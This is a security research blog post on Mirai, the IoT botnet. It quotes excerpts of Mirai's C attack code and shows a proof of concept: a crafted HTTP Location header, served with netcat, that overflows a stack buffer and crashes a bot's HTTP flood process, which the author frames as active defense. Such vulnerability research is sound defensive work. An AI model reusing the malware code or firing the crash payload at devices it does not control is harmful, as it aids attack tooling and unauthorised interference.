Killing Mirai: Active defense against an IoT botnet (Part 1)

By: Scott Tenaglia

October 22, 2016

In recent weeks the world has witnessed the concept of an IoT botnet turn from theory to reality, with devastating consequences. While the ISPs, DDoS mitigation services, and others scramble to figure out how to augment traditional defenses to handle this new threat, we decided to investigate a less conventional approach. Attackers often rely on exploiting vulnerabilities in software we own to install their tools on our systems. When these tools reside on an IoT device things become even more complicated, because the attacker may now have more access to device than we do. So why not use their own strategy against them?

This is the first in a series of posts that will uncover vulnerabilities in the Mirai botnet, and show how exploiting these vulnerabilities can be used to stop attacks. Note, we are not advocating counterattack, but merely showing the possibility of using an active defense strategy to combat a new form of an old threat.

In the beginning…

It’s important to understand how Mirai initiates an attack, in order to understand the implications of exploiting vulnerabilities in the attack code. The code below is Mirai’s attack_start() function, defined in bot/attack.c.

void attack_start(int duration, ATTACK_VECTOR vector, uint8_t targs_len, struct attack_target *targs, uint8_t opts_len, struct attack_option *opts)
{
    int pid1, pid2;
 
    pid1 = fork();
    if (pid1 == -1 || pid1 > 0)
        return;
 
    pid2 = fork();
    if (pid2 == -1)
        exit(0);
    else if (pid2 == 0)
    {
        sleep(duration);
        kill(getppid(), 9);
        exit(0);
    }
    else
    {
        int i;
 
        for (i = 0; i < methods_len; i++) { if (methods[i]->vector == vector)
            {
#ifdef DEBUG
                printf("[attack] Starting attack...n");
#endif
                methods[i]->func(targs_len, targs, opts_len, opts);
                break;
            }
        }
 
        //just bail if the function returns
        exit(0);
    }
}

Lines 5-7 fork a child process that will actually carry out the attack. Lines 9-16 fork another child process that will kill the attack after the specified duration, simply by sleeping for that duration and then killing the parent process when it wakes. Finally, the attack process invokes the correct function handler for the specified attack (lines 22-32), and then exits (line 35). This means that if the attack process crashes, then the attack will stop but the bot itself will remain functional.

It’s all about Location, Location, Location

Perhaps the most significant finding is a stack buffer overflow vulnerability in the HTTP flood attack code. When exploited it will cause a segmentation fault (i.e. SIGSEV) to occur, crash the process, and therefore terminate the attack from that bot. The vulnerable code has to do with how Mirai processes the HTTP location header that may be part of the HTTP response sent from an HTTP flood request. It resides in the attack_app_http() function of bot/attack_app.c, and is as follows:

int offset = util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_LOCATION_HDR, NULL));
if (generic_memes[offset] == ' ')
    offset++;

int nl_off = util_memsearch(generic_memes + offset, ret - offset, "rn", 2);
if (nl_off != -1)
{
    char *loc_ptr = &(generic_memes[offset]);
    if (nl_off >= 2)
        nl_off -= 2;
    generic_memes[offset + nl_off] = 0;

    //increment it one so that it is length of the string excluding null char instead of 0-based offset
    nl_off++;

    if (util_memsearch(loc_ptr, nl_off, "http", 4) == 4)
    {
        //this is an absolute url, domain name change maybe?
        ii = 7;
        //http(s)
        if (loc_ptr[4] == 's')
            ii++;

        memmove(loc_ptr, loc_ptr + ii, nl_off - ii);

To start, let’s assume that the location header is something benign, like:

Location: http://google.comrn

At the point where the above code is executing the generic_memes buffer contains the entire HTTP response. Lines 1-3 find the location header and populate the offset variable with the index of the start of the URL (i.e. the 'h' character). Then, lines 5-15 populate the nl_off variable with the index of the 'rn' that terminates the header value. It’s important to note that this is a zero-based index from the beginning of the URL, NOT the beginning of the location header or the generic_memes buffer. The call to memmove on line 25 is attempting to remove the "http://" from the URL by simply shifting what comes after to the left 7 characters. This is why the ii variable is set to 7 on line 20. In the benign case nl_off is 18, which means that the len parameter of memmove is nl_off - ii or 18 - 7:

memmove(loc_ptr, loc_ptr + 7, 11);

Which successfully shifts “google.com” (a 10 character string plus null-terminator) to the left 7 characters. However, if instead the location header were:

Location: httprn

Then nl_off is 5, which means that the len parameter of memmove is nl_off - ii or 5 - 7:

memmove(loc_ptr, loc_ptr + 7, -2);

The len parameter of memmove is treated as a unsigned integer (i.e. of type size_t), which means that -2 is treated as the really large positive number, 0xFFFFFFFE. Therefore, memmove will overflow the generic_memes buffer and corrupt a whole bunch of memory.

PoC

To verify that the vulnerability is indeed exploitable we setup 3 virtual machines to run the Mirai command and control server, a debug instance of the Mirai bot, and a victim. All virtual machines are 32-bit instances of Ubuntu 16.04. The victim simply serves up a file called location_attack with the following contents (carriage-return and new-line replaced with ‘r’ and ‘n’ for readability):

HTTP/1.0 200 OK
Location: httprn
rn

An instance of netcat listening on port 80 will suffice to actually serve the file:

nc -l 80 < location_attack

As mentioned previously, the bot forks before executing the attack code, so when observing the bot’s debug console there is no visual indicator that it crashes, other than the cessation of the attack. Instead, we’ll show GDB catching the SIGSEGV and exam the program’s state. To start, let’s take a look at how we actually execute an attack with the command and control server.

Figure 1: Using Mirai’s CNC console to execute an HTTP flood attack

By default the bot will send a GET request to the victim (Figure 2). Note that it also inserted the foo.com domain in the host header field.

Figure 2: An HTTP flood request seen by the victim

Finally, let’s see what happened to the bot. Figure 3 shows a running instance of the Mirai bot compiled with debug flags and running in GDB. At the top of the figure the “Starting attack…” debug message is printed from the attack_start() function discussed above, followed by the exact HTTP flood request that we saw the victim receive. Next, we see that the program receives a SIGSEV immediately after receiving our location header exploit.

Figure 3: Debug compilation of Mirai bot running in GDB and crashing on the response from the victim

Figure 4 shows what the stack looks like immediately after the crash. Using the backtrace command it is clear that the crash occurred in memmove, which was called by attack_app_http, but the rest of the stack seems to be corrupted. This coincides with what one would expect after overflowing the generic_memes buffer, because it is defined on the stack:

char generic_memes[10241] = {0};

Figure 4: Verifying stack corruption with the GDB backtrace command

Finally, to drive the point home let’s check the values of nl_off and ii.

Figure 5: Verifying that `nl_off` and `ii` have the correct values

Conclusion

This simple “exploit” is an example of active defense against an IoT botnet that could be used by any DDoS mitigation service to defend against a Mirai-based HTTP flood attack in real-time. While it can’t be used to remove the bot from the IoT device, it can be used to halt the attack originating from that particular device. Unfortunately, it’s specific to the HTTP flood attack, so it would not help mitigate the recent DNS-based DDoS attack that rendered many websites inaccessible. In subsequent posts we’ll exam vulnerabilities in other attack code that may be useful in developing mitigations for other types of attacks.

About the Author

Scott Tenaglia

Scott Tenaglia is a research director and senior principal research engineer at Two Six Labs. He manages a portfolio of US government-sponsored cyber R&D programs that explore a range of topics, to include cyber attribution, vulnerability research, and secure software design. Tenaglia also heads Two Six Labs' device assessment offering, which provides deep forensic analysis of embedded devices, such as point-of-sale skimmers and shimmers. Previously, Tenaglia was a lead cybersecurity engineer at MITRE Corporation.